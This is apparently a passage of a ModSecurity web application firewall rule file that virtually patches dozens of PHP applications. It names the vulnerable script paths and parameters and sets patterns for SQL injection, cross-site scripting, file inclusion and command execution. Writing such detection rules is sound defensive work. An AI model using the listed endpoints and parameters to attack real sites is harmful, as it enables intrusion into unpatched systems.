SecRule ARGS:m "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: PHP ticket "frm_search_in" SQL Injection Vulnerability
SecRule REQUEST_URI "search\.php" "chain,id:390036,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nuked-Klan SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:frm_search_in "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: G-Book "g_message" Script Insertion Vulnerability
SecRule REQUEST_URI "/guestbook\.php" "chain,id:390038,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: G-Book g_message Script Insertion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:g_message "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: PHPMyChat exploit
#SecRule REQUEST_URI "messagesL\.php.?\?L=.*R=.*N=.*&T=.*cmd=" "id:391139,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPMyChat exploit'"
# Rule 310019: Internet PhotoShow Remote File Inclusion Exploit
#SecRule REQUEST_URI "index\.php?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/.*\?&[a-z]+=[a-z]" "id:390041,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Internet PhotoShow Remote File Inclusion Exploit'"
# Rule 310019: phpinfo.cgi command execution
SecRule REQUEST_URI "/phpinfo\.php\?cmd=" "id:390044,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpinfo.cgi command execution',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019: openEngine "template" Parameter Local File Inclusion Vulnerability
SecRule REQUEST_URI "website\.php" "chain,id:390046,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: openEngine template Parameter Local File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:template "\.\./\.\."
# Rule 310019: ISPConfig "go_info[server][classes_root]" File Inclusion
#SecRule REQUEST_URI "lib/session\.inc\.php" "chain,id:390047,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ISPConfig go_info[server][classes_root] File Inclusion'"
#SecRule REQUEST_URI "go_info\[server\]\[classes_root\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: AliPAGER "ubild" Cross-Site Scripting and SQL Injection
SecRule REQUEST_URI "inc/elementz\.php" "chain,id:390049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AliPAGER ubild Cross-Site Scripting and SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:ubild "((javascript|script|about|applet|activex|chrome)*\>|(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from))"
# Rule 310019: MxBB Portal pafiledb Module "module_root_path" File Inclusion
SecRule REQUEST_URI "includes/pafiledb_constants\.php" "chain,id:390050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MxBB Portal pafiledb Module module_root_path File Inclusion',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:module_root_path "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Jadu CMS "register.php" Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "site/scripts/register\.php" "chain,id:390051,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Jadu CMS register.php Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:forename|ARGS:surname|ARGS:reg_email|ARGS:email_conf|ARGS:company|ARGS:city|ARGS:postcode|ARGS:telephone "(javascript|script|about|applet|activex|chrome|php)*\>"
# Rule 310019: OpenFAQ "q" Parameter Script Insertion Vulnerability
SecRule REQUEST_URI "search\.php" "chain,id:390052,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenFAQ q Parameter Script Insertion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:q "(javascript|script|about|applet|activex|chrome)*\>"
# Rule 310019: Sugar Suite "sugarEntry" Parameter Security Bypass
#SecRule REQUEST_URI "/modules/.*/.*\.php\?globals\[sugarEntry\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "id:390054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite sugarEntry Parameter Security Bypass'"
# Rule 310019: Sugar Suite "sugarEntry" Parameter Security Bypass
#SecRule REQUEST_URI "/modules/.*/.*\.php\?cmd=.*globals\[sugarEntry\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "id:390055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite sugarEntry Parameter Security Bypass'"
# Rule 310019: Sugar Suite "sugarEntry" Parameter Security Bypass
#SecRule REQUEST_URI "/modules/.*/.*\.php" "chain,id:390056,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite sugarEntry Parameter Security Bypass'"
#SecRule REQUEST_BODY|REQUEST_URI "\?globals\[sugarEntry\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Sugar Suite exploit
#SecRule REQUEST_URI "modules/Administration/RebuildAudit\.php\?cmd=" #"id:390057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite exploit'"
# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "tiki-lastchanges\.php" "chain,id:390058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:days|ARGS:offset "(javascript|script|about|applet|activex|chrome)+.?\>"
# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "tiki-orphan_pages\.php" "chain,id:390059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:find "(javascript|script|about|applet|activex|chrome)+.?\>"
# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "tiki-listpages\.php" "chain,id:390060,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:offset|ARGS:initial "(javascript|script|about|applet|activex|chrome)+.?\>"
# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "tiki-remind_password\.php" "chain,id:390061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:username "(javascript|script|about|applet|activex|chrome)+.?\>"
# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "tiki-(admin_(rssmodules|notifications|content_templates|chat)|syslog)\.php" "chain,id:390062,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:offset "(javascript|script|about|applet|activex|chrome)+.?\>"
# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "tiki-adminusers\.php" "chain,id:390063,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:numrows "(javascript|script|about|applet|activex|chrome)+.?\>"
# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "tiki-searchindex\.php" "chain,id:390095,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:highlist "(javascript|script|about|applet|activex|chrome)+.?\>"
# Rule 310019: Wordpress shell injection Vulnerability
SecRule REQUEST_URI "/cache/user" "chain,id:390064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress shell injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\?cmd="
# Rule 310019: Nucleus <= 3.22 arbitrary remote inclusion exploit
#SecRule REQUEST_URI "PLUGINADMIN\.php\?globals\[DIR_LIBS\]=((ht|f)tps?\:/|/tmp|/opt|/etc|/export|/var|/home|/usr|\.\.)" "id:390065,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nucleus arbitrary remote inclusion exploit'"
# Rule 310019: CMS-Bandits "spaw_root" File Inclusion Vulnerabilities
SecRule REQUEST_URI "dialogs/(img|td|table)\.php" "chain,id:390067,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CMS-Bandits spaw_root File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:spaw_root "(ht|f)tps?\:/"
# Rule 310019: Admanager Pro exploit
SecRule REQUEST_URI "common\.php" "chain,id:390069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Admanager Pro exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:ipath "((ht|f)tps?\:/|\.\./)"
# Rule 310019: Bible Portal Project destination File Inclusion Vulnerability'
SecRule REQUEST_URI "Admin/rtf_parser\.php" "chain,id:390071,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bible Portal Project destination File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:destination "((ht|f)tps?\:/|\.\./)"
# Rule 310019: Flipper Poll "root_path" File Inclusion Vulnerability
SecRule REQUEST_URI "poll\.php" "chain,id:390072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Flipper Poll root_path File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:root_path "((ht|f)tps?\:/|\.\./)"
# Rule 310019: PictureDis Products "lang" Parameter File Inclusion Vulnerability
SecRule REQUEST_URI "(thumstbl|wpfiles|wallpapr)\.php" "chain,id:390073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PictureDis Products lang Parameter File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:lang "((ht|f)tps?\:/|\.\./)"
# Rule 310019: Joomla and Mambo 'Weblinks' blind SQL injection / admin credentials EXPLOIT
SecRule REQUEST_URI "index\.php" "chain,id:390074,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla/Mambo Weblinks blind SQL injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:title "(users[[:space:]]+WHERE[[:space:]]+usertype|union[[:space:]]+select[[:space:]]+IF|insert[[:space:]]+into.+values|select.+from|bulk[[:space:]]+insert|union.+select)" chain
SecRule ARGS:task "save"
# Rule 310019: phpBB Mail2Forum Module "m2f_root_path" File Inclusion
SecRule ARGS:m2f_root_path "((ht|f)tps?\:/|\.\./)" "id:390076,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic m2f_root_path File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019:
SecRule REQUEST_URI "downloads\.php" "chain,id:390077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic PHP download incddir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:incdir "((ht|f)tps?\:/|\.\./)"
# Rule 310019: SiteDepth CMS "SD_DIR" Parameter Handling Remote File Inclusion Vulnerability
SecRule REQUEST_URI "constants\.php" "chain,id:390078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SiteDepth CMS SD_DIR Parameter Handling Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:SD_DIR "((ht|f)tps?\:/|\.\./)"
# Rule 310019: PhpLinkExchange "page" Parameter Handling Remote File Inclusion Vulnerability
SecRule REQUEST_URI "^/index\.php" "chain,id:390079,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpLinkExchange page Parameter Handling Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:page "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./)"
# Rule 310019: authldap
SecRule REQUEST_URI "authldap\.php" "chain,id:390081,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: authldap Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:includePath "(?:(ht|f)tps?\:/|\.\./)"
# Rule 310019: honeypot
SecRule REQUEST_URI "global_header\.php" "chain,id:390082,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: globalheader domain variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:domain "(?:(?:ht|f)tps?\:/|\.\./)"
# Rule 310019: Generic default_path variable remote file include
SecRule REQUEST_URI "\.php" "chain,id:390092,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP default_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:default_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: file_upload sbp remote file inclusion vuln
SecRule REQUEST_URI "file_upload\.php" "chain,id:390090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: file_upload sbp variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:sbp "(?:(?:ht|f)tps?\:/|\.\./)"
# Rule 310019: viewtopic sid remote file inclusion vuln
SecRule REQUEST_URI "viewtopic\.php" "chain,id:390091,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: viewtopic sid variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:sid "(?:(?:ht|f)tps?\:/|\.\./)"
# Rule 310019: get_infochannel root_path remote file inclusion vuln
SecRule REQUEST_URI "get_infochannel\.inc\.php" "chain,id:390093,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: get_infochannel root_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:root_path "(?:(?:ht|f)tps?\:/|\.\./)"
# Rule 310019: Generic default_path variable remote file include
#SecRule REQUEST_URI "\.php" "chain,id:390096,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP glConf variable Remote File Inclusion Vulnerability'"
#SecRule REQUEST_URI "glConf\[path_library\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: MyNewsGroups :) "myng_root" File Inclusion Vulnerability
SecRule REQUEST_URI "layersmenu\.inc\.php" "chain,id:390097,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyNewsGroups myng_root Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:myng_root "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: pageheaderdefault sysSessionPath upload exploit
SecRule REQUEST_URI "pageheaderdefault\.inc\.php\?" "chain,id:390100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pageheaderdefault sysSessionPath upload exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "_sysSessionPath=(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: new pattern
SecRule REQUEST_URI "\.php\?" "chain,id:390101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: possible vulnscan6 exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "(?:config_ext\[languages_dir\]|dir\[inc\])=((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Socketwiz Bookmarks "root_dir" File Inclusion Vulnerability
SecRule REQUEST_URI "smarty_config\.php" "chain,id:390102,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Socketwiz Bookmarks root_dir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:root_dir "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: MyABraCaDaWeb "base" File Inclusion Vulnerabilities
#SecRule REQUEST_URI "(index|pop)\.php" "chain,id:390103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyABraCaDaWeb base File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
#SecRule ARGS:base "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Vivvo Article Management CMS SQL Injection and File Inclusion
SecRule REQUEST_URI "pdf_version\.php" "chain,id:390104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vivvo Article Management CMS SQL Injection'"
SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: RaidenHTTPD "SoftParserFileXml" File Inclusion Vulnerability
SecRule REQUEST_URI "raidenhttpd-admin/slice/check\.php" "chain,id:390106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RaidenHTTPD SoftParserFileXml File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:SoftParserFileXml "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: mcGalleryPRO "path_to_folder" File Inclusion Vulnerability
SecRule REQUEST_URI "random2\.php" "chain,id:390107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcGalleryPRO path_to_folder File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:path_to_folder "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Timesheet PHP "username" Parameter SQL Injection
SecRule REQUEST_URI "username\.php" "chain,id:390108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Timesheet PHP username Parameter SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: photokorn "dir_path" File Inclusion Vulnerabilities
SecRule REQUEST_URI "(includes/cart\.inc\.php|extras/ext_cat\.php)" "chain,id:390111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: photokorn dir_path File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:dir_path "(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 310019: Somery "skindir" File Inclusion Vulnerability
SecRule REQUEST_URI "admin/system/include\.php" "chain,id:390112,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Somery skindir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:skindir "(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 310019: DokuWiki "TARGET_FN" directory Traversal Vulnerability
SecRule REQUEST_URI "bin/dwpage\.php" "chain,id:390113,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DokuWiki TARGET_FN directory Traversal Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:TARGET_FN "(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 310019: Fantastic News "config[script_path]" File Inclusion Vulnerabilities
SecRule REQUEST_URI "(?:archive|headlines)\.php" "chain,id:390114,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Fantastic News config[script_path] File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "config\[script_path\]=(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 310019: phpGroupWare Local File Inclusion Vulnerability
SecRule REQUEST_URI "alendar/inc/class.holidaycalc\.inc\.php" "chain,id:390133,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpGroupWare Local File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "phpgw_info\[user\]\[preferences\]\[common\]\[country\]=\.\./\.\."
# Rule 310019: ExBB Italia "exbb[home_path]" File Inclusion Vulnerability
SecRule REQUEST_URI "modules/userstop/userstop\.php" "chain,id:390134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ExBB Italia exbb[home_path] File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "exbb\[home_path\]=((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Web3news "PHPSECURITYADMIN_path" File Inclusion
SecRule REQUEST_URI "security/include/_class\.security\.php" "chain,id:390135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Web3news PHPSECURITYADMIN_path File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:PHPSECURITYADMIN_path "(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 310019: phpCOIN "_ccfg[_pkg_path_incl]" File Inclusion
SecRule REQUEST_URI "\.php\?" "chain,id:390136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN _ccfg[_pkg_path_incl] File Inclusion',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "_ccfg\[_pkg_path_incl\]=(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 310019: Eazy Cart Multiple Vulnerabilities
SecRule REQUEST_URI "easycart\.php" "chain,id:390154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Eazy Cart SQL injection'"
SecRule ARGS:price "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: Eazy Cart Multiple Vulnerabilities
SecRule REQUEST_URI "easycart\.php" "chain,id:390156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Eazy Cart XSS ATTACK',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS "<[[:space:]]*(script|about|applet|activex|chrome)"
# Rule 310019: WebYep "webyep_sIncludePath" File Inclusion Vulnerabilities
SecRule REQUEST_URI "webyep-system/program/((lib|elements)/|webyep\.php)" "chain,id:390157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebYep webyep_sIncludePath File Inclusion Vulnerabilities'"
SecRule ARGS:webyep_sIncludePath "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Travelsized CMS "setup_folder" File Inclusion Vulnerability
SecRule REQUEST_URI "frontpage\.php" "chain,id:390158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Travelsized CMS setup_folder File Inclusion Vulnerabilities'"
SecRule ARGS:setup_folder "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: Videodb "config[pdf_module]" File Inclusion Vulnerability
#SecRule REQUEST_URI "core/pdf\.php" "chain,id:390159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Videodb File Inclusion Vulnerabilities'"
#SecRule REQUEST_URI "config\[pdf_module\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: AllMyGuests "_AMGconfig[cfg_serverpath]" File Inclusion
#SecRule REQUEST_URI "signin\.php" "chain,id:390160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AllMyGuests File Inclusion Vulnerabilities'"
#SecRule REQUEST_URI "_AMGconfig\[cfg_serverpath\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: OpenBiblio Local File Inclusion and SQL Injection
SecRule REQUEST_URI "shared/(header|help)\.php" "chain,id:390161,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenBiblio File Inclusion Vulnerabilities'"
SecRule ARGS "(((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)|(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from))"
# Rule 310019: BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities
